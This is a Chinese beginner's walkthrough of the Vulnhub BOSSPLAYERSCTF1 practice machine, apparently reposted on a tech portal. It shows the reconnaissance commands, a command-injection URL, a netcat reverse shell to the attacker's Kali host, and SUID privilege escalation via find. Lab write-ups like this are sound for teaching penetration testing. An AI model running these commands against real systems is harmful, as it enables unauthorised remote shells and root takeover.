IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 看完这篇 教你玩转渗透测试靶机vulnhub——BOSSPLAYERSCTF1 -> 正文阅读

[网络协议]看完这篇 教你玩转渗透测试靶机vulnhub——BOSSPLAYERSCTF1

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是新手CTF得靶机还是老样子找到flag.txt即可。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/bossplayersctf-1,375/

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.101 靶机IP :192.168.0.100

使用命令:nmap -sS -sV -A -n 192.168.0.100
在这里插入图片描述

发现开启了80端口和22端口,先访问一下80端口 dirb扫一下后台发现index.txt,robots.txt,server-status 依次进行访问。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
先访问一下robots.txt 发现了一串base64加密数值 放kali解密一下 它让我们在努力点兄弟,哈哈哈哈。
在这里插入图片描述
在这里插入图片描述
我们再看看logs.php 看源码会比较完整一点,发现并没有什么可用信息继续访问server-status 也没有可用信息。
在这里插入图片描述
在这里插入图片描述
在看看index.html 查看一下源码 在最下面发现一串base64 继续解码解了三次发现一个php文件:workinginprogress.php
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:命令执行漏洞:

访问这个文件好像可以命令执行 可以使用工具wfuzz检测 我这里直接手动了

http://192.168.0.100/workinginprogress.php?cmd=id

在这里插入图片描述
在这里插入图片描述

③:反弹shell:

先看看靶机里面有没有nc 可以利用漏洞使用命令:http://192.168.0.100/workinginprogress.php?cmd=ls /usr/bin|grep nc
在这里插入图片描述
接着开启本机kali 开启监听端口6666 执行:192.168.0.100/workinginprogress.php?cmd=nc 192.168.0.101 6666 -e/bin/bash

使用python开启交互:python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述

④:suid提权:

使用命令:find / -perm -u=s -type f 2>/dev/null 查找具有suid权限的文件,通过find提权,获得权限。
在这里插入图片描述
使用命令:find . -exec /bin/bash -p \;
在这里插入图片描述

⑤:获取flag:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
至此得到了congratulations祝贺自己,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶场比较适合新手 比较基础容易上手 总结一下知识点:
①:netdiscover 工具得使用
②:nmap的基础使用 (具体可以学一下脚本的使用)
③:dirb (web目录扫描工具)
④:wfuzz 工具得使用
⑤:suid提权 (Linux提权大家可以学习一下)
第一次凌晨熬夜创作,希望对刚学网安的小白有所帮助 (最后一天假期肝一下,明天返校了)感谢支持!!
**

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-07 11:28:02  更:2022-05-07 11:29:04 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 10:51:05-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计